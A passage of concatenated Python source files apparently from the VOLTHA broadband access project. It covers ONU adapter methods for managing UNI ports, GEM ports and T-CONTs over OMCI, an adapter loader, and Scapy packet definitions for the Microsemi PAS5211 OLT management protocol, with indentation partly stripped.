self.send_set_extended_vlan_tagging_operation_vlan_configuration_data_untagged(0x205, 0x1000, cvid)
yield self.wait_for_response()
# MAC Bridge Port config
# Create AR - MacBridgePortConfigData - 513 - 513 - 1 - 1 - 0x102
# TODO: add more entries here for other UNI ports
self.send_create_mac_bridge_port_configuration_data(0x205, 0x201, 5, 1, 0x105)
yield self.wait_for_response()
'''
def add_uni_port(self, device, parent_logical_device_id,
name, parent_port_num=None):
self.log.info('adding-logical-port', device_id=device.id,
logical_device_id=parent_logical_device_id,
name=name)
if parent_port_num is not None:
uni = parent_port_num
port_no = parent_port_num
else:
uni = self.uni_ports[0]
port_no = device.proxy_address.channel_id + uni
# register physical ports
uni_port = Port(
port_no=uni,
label='UNI facing Ethernet port '+str(uni),
type=Port.ETHERNET_UNI,
admin_state=AdminState.ENABLED,
oper_status=OperStatus.ACTIVE
)
self.adapter_agent.add_port(device.id, uni_port)
# add uni port to logical device
cap = OFPPF_1GB_FD | OFPPF_FIBER
self.adapter_agent.add_logical_port(parent_logical_device_id,
LogicalPort(
id='uni-{}'.format(port_no),
ofp_port=ofp_port(
port_no=port_no,
hw_addr=mac_str_to_tuple('00:00:00:%02x:%02x:%02x' %
(device.proxy_address.onu_id & 0xff,
(port_no >> 8) & 0xff,
port_no & 0xff)),
#name='uni-{}'.format(port_no),
name=name,
config=0,
state=OFPPS_LIVE,
curr=cap,
advertised=cap,
peer=cap,
curr_speed=OFPPF_1GB_FD,
max_speed=OFPPF_1GB_FD
),
device_id=device.id,
device_port_no=uni_port.port_no
))
def del_uni_port(self, device, parent_logical_device_id,
name, parent_port_num=None):
self.log.info('del-uni-port', device_id=device.id,
logical_device_id=parent_logical_device_id,
name=name)
if parent_port_num is not None:
uni = parent_port_num
port_no = parent_port_num
else:
uni = self.uni_ports[0]
port_no = device.proxy_address.channel_id + uni
        # find and delete the physical UNI port that matches this interface
        ports = self.adapter_agent.get_ports(self.device_id, Port.ETHERNET_UNI)
        for port in ports:
            if port.label == 'UNI facing Ethernet port '+str(uni):
                self.adapter_agent.delete_port(self.device_id, port)
                break
self.adapter_agent.delete_logical_port_by_id(parent_logical_device_id,
'uni-{}'.format(port_no))
@inlineCallbacks
def delete_v_ont_ani(self, data):
self.log.info('deleting-v_ont_ani')
device = self.adapter_agent.get_device(self.device_id)
# construct message
# MIB Reset - OntData - 0
if device.connect_status != ConnectStatus.REACHABLE:
self.log.error('device-unreachable')
returnValue(None)
self.send_mib_reset()
yield self.wait_for_response()
self.proxy_address = device.proxy_address
self.adapter_agent.unregister_for_proxied_messages(device.proxy_address)
ports = self.adapter_agent.get_ports(self.device_id, Port.PON_ONU)
if ports is not None:
for port in ports:
if port.label == 'PON port':
self.adapter_agent.delete_port(self.device_id, port)
break
def create_interface(self, data):
if isinstance(data, VEnetConfig):
parent_port_num = None
onu_device = self.adapter_agent.get_device(self.device_id)
ports = self.adapter_agent.get_ports(onu_device.parent_id, Port.ETHERNET_UNI)
for port in ports:
if port.label == data.interface.name:
parent_port_num = port.port_no
break
            if parent_port_num is None:
                self.log.error("matching-parent-uni-port-num-not-found")
                return
            parent_device = self.adapter_agent.get_device(onu_device.parent_id)
            logical_device_id = parent_device.parent_id
            assert logical_device_id
            self.add_uni_port(onu_device, logical_device_id,
                              data.name, parent_port_num)
onu_ports = self.adapter_agent.get_ports(self.device_id, Port.PON_ONU)
if onu_ports:
# To-Do :
# Assumed only one PON port and UNI port per ONU.
pon_port = onu_ports[0]
else:
self.log.error("No-Pon-port-configured-yet")
return
self.adapter_agent.delete_port_reference_from_parent(self.device_id,
pon_port)
pon_port.peers[0].device_id = onu_device.parent_id
pon_port.peers[0].port_no = parent_port_num
self.adapter_agent.add_port_reference_to_parent(self.device_id,
pon_port)
else:
self.log.info('Not-handled-Yet')
return
def update_interface(self, data):
self.log.info('Not-Implemented-yet')
return
def remove_interface(self, data):
if isinstance(data, VEnetConfig):
parent_port_num = None
onu_device = self.adapter_agent.get_device(self.device_id)
ports = self.adapter_agent.get_ports(onu_device.parent_id, Port.ETHERNET_UNI)
for port in ports:
if port.label == data.interface.name:
parent_port_num = port.port_no
break
parent_device = self.adapter_agent.get_device(onu_device.parent_id)
logical_device_id = parent_device.parent_id
assert logical_device_id
self.del_uni_port(onu_device, logical_device_id,
data.name, parent_port_num)
        elif isinstance(data, VOntaniConfig):
self.delete_v_ont_ani(data)
else:
self.log.info('not-handled-yet')
return
@inlineCallbacks
def create_gemport(self, data):
self.log.info('create-gemport')
gem_port = GemportsConfigData()
gem_port.CopyFrom(data)
if gem_port.tcont_ref is None:
            self.log.error('received-null-gem-port-data')
else:
            # TODO: Need to see how the value 0x8001 is derived
self.send_create_gem_port_network_ctp(gem_port.gemport_id,
gem_port.gemport_id, 0x8001,
"bi-directional", 0x100)
yield self.wait_for_response()
# GEM Interworking config
# Create AR - GemInterworkingTp - Gem_port,TP_pointer -
# Gem port CTP pointer -
# Mapper service profile id
self.send_create_gem_inteworking_tp(gem_port.gemport_id,
gem_port.gemport_id, 0x8001)
yield self.wait_for_response()
# Mapper Service Profile config
# Set AR - 802.1pMapperServiceProfile - Mapper_ profile_id -
# gem_port_tp pointer
self.send_set_8021p_mapper_service_profile(0x8001,
gem_port.gemport_id)
yield self.wait_for_response()
@inlineCallbacks
def remove_gemport(self, data):
self.log.info('remove-gemport')
gem_port = GemportsConfigData()
gem_port.CopyFrom(data)
device = self.adapter_agent.get_device(self.device_id)
if device.connect_status != ConnectStatus.REACHABLE:
self.log.error('device-unreachable')
returnValue(None)
self.send_set_8021p_mapper_service_profile(0x8001,
0xFFFF)
yield self.wait_for_response()
self.send_delete_omci_mesage(GemInterworkingTp.class_id,
gem_port.gemport_id)
yield self.wait_for_response()
        # TODO: Need to see how the value 0x8001 is derived
self.send_delete_omci_mesage(GemPortNetworkCtp.class_id,
gem_port.gemport_id)
yield self.wait_for_response()
@inlineCallbacks
def create_tcont(self, tcont_data, traffic_descriptor_data):
self.log.info('create-tcont')
tcont = TcontsConfigData()
tcont.CopyFrom(tcont_data)
if tcont.interface_reference is not None:
self.log.debug('tcont', tcont=tcont.alloc_id)
self.send_set_tcont(0x8001, tcont.alloc_id)
yield self.wait_for_response()
else:
            self.log.info('received-null-tcont-data', tcont=tcont.alloc_id)
@inlineCallbacks
def remove_tcont(self, tcont_data, traffic_descriptor_data):
self.log.info('remove-tcont')
device = self.adapter_agent.get_device(self.device_id)
if device.connect_status != ConnectStatus.REACHABLE:
self.log.error('device-unreachable')
returnValue(None)
self.send_set_tcont(0x8001, 0xFFFF)
yield self.wait_for_response()
def create_multicast_gemport(self, data):
self.log.info('Send relevant OMCI message')
@inlineCallbacks
def disable(self, device):
try:
self.log.info('sending-admin-state-lock-towards-device', device=device)
self.send_set_admin_state(0x0000, ADMIN_STATE_LOCK)
yield self.wait_for_response()
device = self.adapter_agent.get_device(device.id)
# Disable all ports on that device
self.adapter_agent.disable_all_ports(self.device_id)
parent_device = self.adapter_agent.get_device(device.parent_id)
logical_device_id = parent_device.parent_id
assert logical_device_id
# Mark OF PORT STATE DOWN
ports = self.adapter_agent.get_ports(device.id, Port.ETHERNET_UNI)
for port in ports:
state = OFPPS_LINK_DOWN
port_id = 'uni-{}'.format(port.port_no)
self.update_logical_port(logical_device_id, port_id, state)
device.oper_status = OperStatus.UNKNOWN
device.connect_status = ConnectStatus.UNREACHABLE
self.adapter_agent.update_device(device)
except Exception as e:
log.exception('exception-in-onu-disable', exception=e)
@inlineCallbacks
def reenable(self, device):
try:
self.log.info('sending-admin-state-unlock-towards-device', device=device)
self.send_set_admin_state(0x0000, ADMIN_STATE_UNLOCK)
yield self.wait_for_response()
device = self.adapter_agent.get_device(device.id)
# Re-enable the ports on that device
self.adapter_agent.enable_all_ports(device.id)
parent_device = self.adapter_agent.get_device(device.parent_id)
logical_device_id = parent_device.parent_id
assert logical_device_id
# Mark OF PORT STATE UP
ports = self.adapter_agent.get_ports(device.id, Port.ETHERNET_UNI)
for port in ports:
state = OFPPS_LIVE
port_id = 'uni-{}'.format(port.port_no)
self.update_logical_port(logical_device_id, port_id, state)
device.oper_status = OperStatus.ACTIVE
device.connect_status = ConnectStatus.REACHABLE
self.adapter_agent.update_device(device)
except Exception as e:
log.exception('exception-in-onu-reenable', exception=e)
@inlineCallbacks
def reboot(self):
self.log.info('reboot-device')
device = self.adapter_agent.get_device(self.device_id)
if device.connect_status != ConnectStatus.REACHABLE:
self.log.error("device-unreacable")
returnValue(None)
self.send_reboot()
response = yield self.wait_for_response()
if response is not None:
omci_response = response.getfieldval("omci_message")
success_code = omci_response.getfieldval("success_code")
if success_code == 0:
self.log.info("reboot-command-processed-successfully")
# Update the device connection and operation status
device = self.adapter_agent.get_device(self.device_id)
device.connect_status = ConnectStatus.UNREACHABLE
device.oper_status = OperStatus.DISCOVERED
self.adapter_agent.update_device(device)
self.disable_ports(device)
else:
self.log.info("reboot-failed", success_code=success_code)
else:
self.log.info("error-in-processing-reboot-response")
def disable_ports(self, onu_device):
self.log.info('disable-ports', device_id=self.device_id)
# Disable all ports on that device
self.adapter_agent.disable_all_ports(self.device_id)
parent_device = self.adapter_agent.get_device(onu_device.parent_id)
assert parent_device
logical_device_id = parent_device.parent_id
assert logical_device_id
ports = self.adapter_agent.get_ports(onu_device.id, Port.ETHERNET_UNI)
for port in ports:
port_id = 'uni-{}'.format(port.port_no)
self.update_logical_port(logical_device_id, port_id, OFPPS_LINK_DOWN)
```
#### File: voltha/adapters/loader.py
```python
import os
import structlog
from twisted.internet.defer import inlineCallbacks, returnValue
from zope.interface import implementer
from zope.interface.verify import verifyClass
from voltha.adapters.interface import IAdapterInterface
from voltha.core.adapter_agent import AdapterAgent
from voltha.registry import IComponent
from voltha.adapters.iadapter import IAdapter, OltAdapter, OnuAdapter
log = structlog.get_logger()
mydir = os.path.abspath(os.path.dirname(__file__))
@implementer(IComponent)
class AdapterLoader(object):
def __init__(self, config):
self.config = config
self.adapter_agents = {} # adapter-name -> adapter instance
@inlineCallbacks
def start(self):
log.debug('starting')
for adapter_name, adapter_class in self._find_adapters():
agent = AdapterAgent(adapter_name, adapter_class)
yield agent.start()
self.adapter_agents[adapter_name] = agent
log.info('started')
returnValue(self)
@inlineCallbacks
def stop(self):
log.debug('stopping')
for proxy in self.adapter_agents.values():
yield proxy.stop()
self.adapter_agents = {}
log.info('stopped')
def get_agent(self, adapter_name):
return self.adapter_agents[adapter_name]
def _find_adapters(self):
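        # Adapter discovery convention: every immediate subdirectory of
        # voltha/adapters that contains a module named after itself
        # (<name>/<name>.py) is imported, and any class in it that implements
        # IAdapterInterface (other than the IAdapter/OltAdapter/OnuAdapter
        # base classes) is yielded as (adapter_name, class).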
subdirs = os.walk(mydir).next()[1]
for subdir in subdirs:
try:
adapter_name = subdir
py_file = os.path.join(mydir, subdir, subdir + '.py')
if os.path.isfile(py_file):
try:
package_name = __package__ + '.' + subdir
pkg = __import__(package_name, None, None, [adapter_name])
module = getattr(pkg, adapter_name)
except ImportError, e:
log.exception('cannot-load', file=py_file, e=e)
continue
for attr_name in dir(module):
cls = getattr(module, attr_name)
if isinstance(cls, type) and \
cls is not IAdapter and \
cls is not OltAdapter and \
cls is not OnuAdapter and \
IAdapterInterface.implementedBy(cls):
verifyClass(IAdapterInterface, cls)
yield adapter_name, cls
except Exception, e:
log.exception('failed', e=e)
```
#### File: adapters/microsemi_olt/PAS5211.py
```python
import struct
from scapy.fields import LEShortField, Field, LEIntField, LESignedIntField, FieldLenField, FieldListField, PacketField, \
ByteField, StrFixedLenField, ConditionalField, StrField, MACField, LELongField, LenField, StrLenField
from scapy.layers.l2 import DestMACField, ETHER_ANY, Ether
from scapy.packet import Packet, bind_layers
from scapy.utils import lhex
from scapy.volatile import RandSInt
from scapy.layers.ntp import XLEShortField
from voltha.adapters.microsemi_olt.PAS5211_constants import PON_ENABLE, PON_PORT_PON, PON_FALSE, PON_TRUE
from voltha.extensions.omci.omci_frame import OmciFrame
"""
PAS5211 Constants
"""
# TODO: get range from olt_version message
CHANNELS = range(0, 4)
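# The classes below are Scapy Packet definitions for the Microsemi/PMC
# PAS5211 management protocol: every message is wrapped in a
# PAS5211FrameHeader plus PAS5211MsgHeader, multi-byte fields are
# little-endian (the LE*/XLE* field types), and request and response
# classes each carry their protocol opcode.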
class XLESignedIntField(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "<i")
def randval(self):
return RandSInt()
def i2repr(self, pkt, x):
return lhex(self.i2h(pkt, x))
class LESignedShortField(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "<h")
class PAS5211FrameHeader(Packet):
name = "PAS5211FrameHeader"
fields_desc = [
LEShortField("part", 1),
LEShortField("total_parts", 1),
LEShortField("size", 0),
XLESignedIntField("magic_number", 0x1234ABCD)
]
class PAS5211MsgHeader(Packet):
name = "PAS5211MsgHeader"
fields_desc = [
LEIntField("sequence_number", 0),
XLEShortField("opcode", 0),
LEShortField("event_type", 0),
LESignedShortField("channel_id", -1),
LESignedShortField("onu_id", -1),
LESignedIntField("onu_session_id", -1)
]
class PAS5211Msg(Packet):
opcode = "Must be filled by subclass"
pass
class PAS5211MsgGetProtocolVersion(PAS5211Msg):
opcode = 2
name = "PAS5211MsgGetProtocolVersion"
fields_desc = [ ]
class PAS5211MsgGetProtocolVersionResponse(PAS5211Msg):
name = "PAS5211MsgGetProtocolVersionResponse"
fields_desc = [
LEShortField("major_hardware_version", 0),
LEShortField("minor_hardware_version", 0),
LEShortField("major_pfi_version", 0),
LEShortField("minor_pfi_version", 0)
]
class PAS5211MsgGetOltVersion(PAS5211Msg):
opcode = 3
name = "PAS5211MsgGetOltVersion"
fields_desc = [ ]
class PAS5211MsgGetOltVersionResponse(PAS5211Msg):
name = "PAS5211MsgGetOltVersionResponse"
fields_desc = [
LEShortField("major_firmware_version", 0),
LEShortField("minor_firmware_version", 0),
LEShortField("build_firmware_version", 0),
LEShortField("maintenance_firmware_version", 0),
LEShortField("major_hardware_version", 0),
LEShortField("minor_hardware_version", 0),
LEIntField("system_port_mac_type", 0),
FieldLenField("channels_supported", 0, fmt="<H"),
LEShortField("onus_supported_per_channel", 0),
LEShortField("ports_supported_per_channel", 0),
LEShortField("alloc_ids_supported_per_channel", 0),
FieldListField("critical_events_counter", [0, 0, 0, 0],
LEIntField("entry", 0),
count_from=lambda pkt: pkt.channels_supported),
FieldListField("non_critical_events_counter", [0, 0, 0, 0],
LEIntField("entry", 0),
count_from=lambda pkt: pkt.channels_supported)
]
class SnrBurstDelay(Packet):
name = "SnrBurstDelay"
fields_desc= [
LEShortField("timer_delay", None),
LEShortField("preamble_delay", None),
LEShortField("delimiter_delay", None),
LEShortField("burst_delay", None)
]
def extract_padding(self, p):
return "", p
class RngBurstDelay(Packet):
name = "SnrBurstDelay"
fields_desc= [
LEShortField("timer_delay", None),
LEShortField("preamble_delay", None),
LEShortField("delimiter_delay", None)
]
def extract_padding(self, p):
return "", p
class BurstTimingCtrl(Packet):
name = "BurstTimingCtrl"
fields_desc = [
PacketField("snr_burst_delay", None, SnrBurstDelay),
PacketField("rng_burst_delay", None, RngBurstDelay),
LEShortField("burst_delay_single", None),
LEShortField("burst_delay_double", None)
]
def extract_padding(self, p):
return "", p
class GeneralOpticsParams(Packet):
name = "GeneralOpticsParams"
fields_desc= [
ByteField("laser_reset_polarity", None),
ByteField("laser_sd_polarity", None),
ByteField("sd_source", None),
ByteField("sd_hold_snr_ranging", None),
ByteField("sd_hold_normal", None),
ByteField("reset_type_snr_ranging", None),
ByteField("reset_type_normal", None),
ByteField("laser_reset_enable", None),
]
def extract_padding(self, p):
return "", p
class ResetValues(Packet):
name = "ResetDataBurst"
fields_desc = [
ByteField("bcdr_reset_d2", None),
ByteField("bcdr_reset_d1", None),
ByteField("laser_reset_d2", None),
ByteField("laser_reset_d1", None)
]
def extract_padding(self, p):
return "", p
class DoubleResetValues(Packet):
name = "ResetDataBurst"
fields_desc = [
ByteField("bcdr_reset_d4", None),
ByteField("bcdr_reset_d3", None),
ByteField("laser_reset_d4", None),
ByteField("laser_reset_d3", None)
]
def extract_padding(self, p):
return "", p
class ResetTimingCtrl(Packet):
name = "ResetTimingCtrl"
fields_desc = [
PacketField("reset_data_burst", None, ResetValues),
PacketField("reset_snr_burst", None, ResetValues),
PacketField("reset_rng_burst", None, ResetValues),
PacketField("single_reset", None, ResetValues),
PacketField("double_reset", None, DoubleResetValues),
]
def extract_padding(self, p):
return "", p
class PreambleParams(Packet):
name = "PreambleParams"
fields_desc = [
ByteField("correlation_preamble_length", None),
ByteField("preamble_length_snr_rng", None),
ByteField("guard_time_data_mode", None),
ByteField("type1_size_data", None),
ByteField("type2_size_data", None),
ByteField("type3_size_data", None),
ByteField("type3_pattern", None),
ByteField("delimiter_size", None),
ByteField("delimiter_byte1", None),
ByteField("delimiter_byte2", None),
ByteField("delimiter_byte3", None)
]
def extract_padding(self, p):
return "", p
class PAS5211MsgSetOltOptics(PAS5211Msg):
opcode = 106
name = "PAS5211MsgSetOltOptics"
fields_desc = [
PacketField("burst_timing_ctrl", None, BurstTimingCtrl),
PacketField("general_optics_params", None, GeneralOpticsParams),
ByteField("reserved1", 0),
ByteField("reserved2", 0),
ByteField("reserved3", 0),
PacketField("reset_timing_ctrl", None, ResetTimingCtrl),
ByteField("voltage_if_mode", None),
PacketField("preamble_params", None, PreambleParams),
ByteField("reserved4", 0),
ByteField("reserved5", 0),
ByteField("reserved6", 0)
]
class PAS5211MsgSetOltOpticsResponse(PAS5211Msg):
name = "PAS5211MsgSetOltOpticsResponse"
fields_desc = []
class PAS5211MsgSetOpticsIoControl(PAS5211Msg):
opcode = 108
name = "PAS5211MsgSetOpticsIoControl"
fields_desc = [
ByteField("i2c_clk", None),
ByteField("i2c_data", None),
ByteField("tx_enable", None),
ByteField("tx_fault", None),
ByteField("tx_enable_polarity", None),
ByteField("tx_fault_polarity", None),
]
class PAS5211MsgSetOpticsIoControlResponse(PAS5211Msg):
name = "PAS5211MsgSetOpticsIoControlResponse"
fields_desc = [ ]
def extract_padding(self, p):
return "", p
class PAS5211MsgStartDbaAlgorithm(PAS5211Msg):
opcode = 55
name = "PAS5211MsgStartDbaAlgorithm"
fields_desc = [
LEShortField("size", 0),
ByteField("initialization_data", None)
]
class PAS5211MsgStartDbaAlgorithmResponse(PAS5211Msg):
name = "PAS5211MsgStartDbaAlgorithmResponse"
opcode = 10295
fields_desc = []
class PAS5211MsgSetGeneralParam(PAS5211Msg):
opcode = 164
name = "PAS5211MsgSetGeneralParam"
fields_desc = [
LEIntField("parameter", None),
LEIntField("reserved", 0),
LEIntField("value", None)
]
class PAS5211MsgSetGeneralParamResponse(PAS5211Msg):
name = "PAS5211MsgSetGeneralParamResponse"
fields_desc = []
class PAS5211MsgGetGeneralParam(PAS5211Msg):
opcode = 165
name = "PAS5211MsgGetGeneralParam"
fields_desc = [
LEIntField("parameter", None),
LEIntField("reserved", 0),
]
class PAS5211MsgGetGeneralParamResponse(PAS5211Msg):
name = "PAS5211MsgGetGeneralParamResponse"
fields_desc = [
LEIntField("parameter", None),
LEIntField("reserved", 0),
LEIntField("value", None)
]
class PAS5211MsgGetDbaMode(PAS5211Msg):
opcode = 57
name = "PAS5211MsgGetDbaMode"
fields_desc = []
class PAS5211MsgGetDbaModeResponse(PAS5211Msg):
name = "PAS5211MsgGetDbaModeResponse"
fields_desc = [
LEIntField("dba_mode", None),
]
class PAS5211MsgAddOltChannel(PAS5211Msg):
opcode = 4
name = "PAS5211MsgAddOltChannel"
fields_desc = [
]
class PAS5211MsgAddOltChannelResponse(PAS5211Msg):
name = "PAS5211MsgAddOltChannelResponse"
fields_desc = [
]
class PAS5211MsgSetAlarmConfig(PAS5211Msg):
opcode = 48
name = "PAS5211MsgSetAlarmConfig"
fields_desc = [
LEShortField("type", None),
LEShortField("activate", None),
LEIntField("parameter1", None),
LEIntField("parameter2", None),
LEIntField("parameter3", None),
LEIntField("parameter4", None)
]
class PAS5211MsgSetOltChannelActivationPeriod(PAS5211Msg):
opcode = 11
name = "PAS5211MsgSetOltChannelActivationPeriod"
fields_desc = [
LEIntField("activation_period", None)
]
class PAS5211MsgSetOltChannelActivationPeriodResponse(PAS5211Msg):
name = "PAS5211MsgSetOltChannelActivationPeriodResponse"
fields_desc = []
class PAS5211MsgSetAlarmConfigResponse(PAS5211Msg):
name = "PAS5211MsgSetAlarmConfigResponse"
fields_desc = []
class PAS5211MsgSendCliCommand(PAS5211Msg):
opcode = 15
name = "PAS5211MsgSendCliCommand"
fields_desc = [
FieldLenField("size", None, fmt="<H", length_of="command"),
StrField("command", "")
]
class PAS5211MsgSwitchToInboundMode(PAS5211Msg):
opcode = 0xec
name = "PAS5211MsgSwitchToInboundMode"
fields_desc = [
MACField("mac", None),
LEShortField("mode", 0)
]
class PAS5211MsgGetActivationAuthMode(PAS5211Msg):
opcode = 145
name = "PAS5211MsgGetActivationAuthMode"
fields_desc = [
LEShortField("nothing", 0) # no idea why this is here
]
class PAS5211MsgGetActivationAuthModeResponse(PAS5211Msg):
opcode = 10385
name = "PAS5211MsgGetActivationAuthModeResponse"
fields_desc = [
LEShortField("mode", 0),
LEShortField("reserved", 0),
]
class PAS5211MsgSetOnuOmciPortId(PAS5211Msg):
opcode = 41
name = "PAS5211MsgSetOnuOmciPortId"
fields_desc = [
LEShortField("port_id", 0),
LEShortField("activate", PON_ENABLE)
]
class PAS5211MsgSetOnuOmciPortIdResponse(PAS5211Msg):
opcode = 10281
name = "PAS5211MsgSetOnuOmciPortIdResponse"
fields_desc = []
class PAS5211MsgGetLogicalObjectStatus(PAS5211Msg):
opcode = 223
name = "PAS5211MsgGetLogicalObjectStatus"
fields_desc = [
LEIntField("type", None),
LEIntField("value", None)
]
class PAS5211MsgGetLogicalObjectStatusResponse(PAS5211Msg):
opcode = 10463
name = "PAS5211MsgGetLogicalObjectStatusResponse"
fields_desc = [
LEIntField("type", None),
LEIntField("value", None),
FieldLenField("return_length", None, fmt="<H", length_of="return_value"),
LEIntField("return_value", "")
]
class PAS5211MsgSetOnuAllocId(PAS5211Msg):
opcode = 8
name = "PAS5211MsgSetOnuAllocId"
fields_desc = [
LEShortField("alloc_id", None),
LEShortField("allocate", None)
]
class PAS5211MsgSetOnuAllocIdResponse(PAS5211Msg):
opcode = 10248
name = "PAS5211MsgSetOnuAllocIdResponse"
fields_desc = []
class PAS5211MsgSendDbaAlgorithmMsg(PAS5211Msg):
opcode = 47
name = "PAS5211MsgSendDbaAlgorithmMsg"
fields_desc = [
#LEShortField("id", None),
FieldLenField("size", None, fmt="<H", length_of="data"),
StrLenField("data", "", length_from=lambda x:x.size)
]
class PAS5211MsgSendDbaAlgorithmMsgResponse(PAS5211Msg):
opcode = 10287
name = "PAS5211MsgSendDbaAlgorithmMsgResponse"
fields_desc = []
class PAS5211MsgSetPortIdConfig(PAS5211Msg):
opcode = 18
name = "PAS5211MsgSetPortIdConfig"
fields_desc = [
LEShortField("port_id", None),
LEShortField("activate", PON_ENABLE),
LEShortField("alloc_id", None),
LEIntField("type", None),
LEIntField("destination", None), # Is this the CNI port
# if yes then values are 0-11 (for ruby)
LEShortField("reserved", None)
]
class PAS5211MsgSetPortIdConfigResponse(PAS5211Msg):
opcode = 10258
name = "PAS5211MsgSetPortIdConfigResponse"
fields_desc = []
class PAS5211MsgGetOnuIdByPortId(PAS5211Msg):
opcode = 196
name = "PAS5211MsgGetOnuIdByPortId"
fields_desc = [
LEShortField("port_id", None),
LEShortField("reserved", 0)
]
class PAS5211MsgGetOnuIdByPortIdResponse(PAS5211Msg):
opcode = 196
name = "PAS5211MsgGetOnuIdByPortIdResponse"
fields_desc = [
LEShortField("valid", None),
LEShortField("onu_id", None)
]
class PAS5211SetVlanUplinkConfiguration(PAS5211Msg):
opcode = 39
name = "PAS5211SetVlanUplinkConfiguration"
fields_desc = [
LEShortField("port_id", None),
LEShortField("pvid_config_enabled", None),
LEShortField("min_cos", None),
LEShortField("max_cos", None),
LEIntField("de_bit", None),
LEShortField("reserved", 0)
]
class PAS5211SetVlanUplinkConfigurationResponse(PAS5211Msg):
opcode = 10279
name = "PAS5211SetVlanUplinkConfigurationResponse"
fields_desc = []
class PAS5211GetOnuAllocs(PAS5211Msg):
opcode = 9
name = "PAS5211GetOnuAllocs"
fields_desc = [
LEShortField("nothing", None) # It's in the PMC code... so yeah.
]
class PAS5211GetOnuAllocsResponse(PAS5211Msg):
opcode = 9
name = "PAS5211GetOnuAllocsResponse"
fields_desc = [
LEShortField("allocs_number", None),
FieldListField("alloc_ids", None, LEShortField("alloc_id", None))
]
class PAS5211GetSnInfo(PAS5211Msg):
opcode = 7
name = "PAS5211GetSnInfo"
fields_desc = [
StrFixedLenField("serial_number", None, 8)
]
class PAS5211GetSnInfoResponse(PAS5211Msg):
opcode = 7
name = "PAS5211GetSnInfoResponse"
fields_desc = [
StrFixedLenField("serial_number", None, 8),
LEShortField("found", None),
LEShortField("type", None),
LEShortField("onu_state", None),
LELongField("equalization_delay", None),
LEShortField("reserved", None)
]
class PAS5211GetOnusRange(PAS5211Msg):
opcode = 116
name = "PAS5211GetOnusRange"
fields_desc = [
LEShortField("nothing", None)
]
class PAS5211GetOnusRangeResponse(PAS5211Msg):
opcode = 116
name = "PAS5211GetOnusRangeResponse"
fields_desc = [
LEIntField("min_distance", None),
LEIntField("max_distance", None),
LEIntField("actual_min_distance", None),
LEIntField("actual_max_distance", None)
]
class PAS5211GetPortIdConfig(PAS5211Msg):
opcode = 19
name = "PAS5211GetPortIdConfig"
fields_desc = [
LEShortField("port_id", None),
LEShortField("reserved", None)
]
class PAS5211GetPortIdConfigResponse(PAS5211Msg):
opcode = 19
name = "PAS5211GetPortIdConfigResponse"
fields_desc = [
LEShortField("activate", None),
LEShortField("encryption_state", None),
LEShortField("alloc_id", None),
LEShortField("type", None),
LEShortField("destination", None),
LEShortField("reserved", None),
]
# typedef struct
# {
# short int svlan_id;
# PON_true_false_t forwarding_mode;
# PON_true_false_t use_svlan;
# PON_true_false_t use_cvlan;
# PON_true_false_t use_pbits;
# PON_true_false_t discard_unknown;
# } PASCOMM_msg_set_svlan_at_configuration_t;
class PAS5211SetSVlanAtConfig(PAS5211Msg):
opcode = 63
name = "PAS5211SetSVlanAtConfig"
fields_desc = [
LEShortField("svlan_id", None),
LEShortField("forwarding_mode", None),
LEShortField("use_svlan", None),
LEShortField("use_cvlan", None),
LEShortField("use_pbits", None),
LEShortField("discard_unknown", None),
]
class PAS5211SetSVlanAtConfigResponse(PAS5211Msg):
opcode = 63
name = "PAS5211SetSVlanAtConfigResponse"
fields_desc = []
# typedef struct
# {
# PON_port_id_t source_port_id;
# PON_vlan_tag_t primary_vid;
# PON_true_false_t pvid_config_enabled; /* use_pvid */
# PON_vlan_tag_operation_t svlan_tag_operation;
# PON_vlan_tag_operation_t cvlan_tag_operation;
# PON_vlan_tag_t new_svlan_tag;
# PON_vlan_tag_t new_cvlan_tag;
# PON_vlan_destination_t destination;
# } PASCOMM_msg_set_uplink_vlan_handling_t;
class PAS5211SetUplinkVlanHandl(PAS5211Msg):
opcode = 34
name = "PAS5211SetUplinkVlanHandl"
fields_desc = [
LEShortField("source_port_id", None),
LEShortField("primary_vid", None),
LEShortField("pvid_config_enabled", None),
LEShortField("svlan_tag_operation", None),
LEShortField("cvlan_tag_operation", None),
LEShortField("new_svlan_tag", None),
LEShortField("new_cvlan_tag", None),
LEShortField("destination", None)
]
class PAS5211SetUplinkVlanHandlResponse(PAS5211Msg):
opcode = 34
name = "PAS5211SetUplinkVlanHandlResponse"
fields_desc = []
# typedef struct
# {
# PON_pon_network_traffic_direction_t direction;
# unsigned short extended_svlan_type;
# unsigned short insertion_svlan_ethertype;
# unsigned short extended_cvlan_type;
# unsigned short insertion_cvlan_ethertype;
# PON_pcp_scheme_t pon_pcp_code;
# PON_pcp_scheme_t cni_pcp_code;
# unsigned short reserved;
# } PASCOMM_msg_set_vlan_general_configuration_t;
class PAS5211SetVlanGenConfig(PAS5211Msg):
opcode = 43
name = "PAS5211SetVlanGenConfig"
fields_desc = [
LEShortField("direction", None),
LEShortField("extended_svlan_type", None),
LEShortField("insertion_svlan_ethertype", None),
LEShortField("extended_cvlan_type", None),
LEShortField("insertion_cvlan_ethertype", None),
LEShortField("pon_pcp_code", None),
LEShortField("cni_pcp_code", None),
LEShortField("reserved", None)
]
class PAS5211SetVlanGenConfigResponse(PAS5211Msg):
opcode = 43
name = "PAS5211SetVlanGenConfigResponse"
fields_desc = []
class Frame(Packet):
pass
class PAS5211MsgSendFrame(PAS5211Msg):
opcode = 42
name = "PAS5211MsgSendFrame"
fields_desc = [
FieldLenField("length", None, fmt="<H", length_of="frame"),
LEShortField("port_type", PON_PORT_PON),
LEShortField("port_id", 0),
LEShortField("management_frame", PON_FALSE),
ConditionalField(PacketField("frame", None, Packet), lambda pkt: pkt.management_frame==PON_FALSE),
ConditionalField(PacketField("frame", None, OmciFrame), lambda pkt: pkt.management_frame==PON_TRUE)
]
def extract_padding(self, p):
return "", p
class PAS5211MsgSendFrameResponse(PAS5211Msg):
name = "PAS5211MsgSendFrameResponse"
fields_desc = []
class PAS5211Event(PAS5211Msg):
opcode = 12
class PAS5211EventFrameReceived(PAS5211Event):
name = "PAS5211EventFrameReceived"
fields_desc = [
FieldLenField("length", None, length_of="frame", fmt="<H"),
LEShortField("port_type", PON_PORT_PON),
LEShortField("port_id", 0),
LEShortField("management_frame", PON_FALSE),
LEShortField("classification_entity", None),
LEShortField("l3_offset", None),
LEShortField("l4_offset", None),
LEShortField("ignored", 0), # TODO these do receive values, but there is no code in PMC using it
ConditionalField(PacketField("frame", None, Packet), lambda pkt: pkt.management_frame==PON_FALSE),
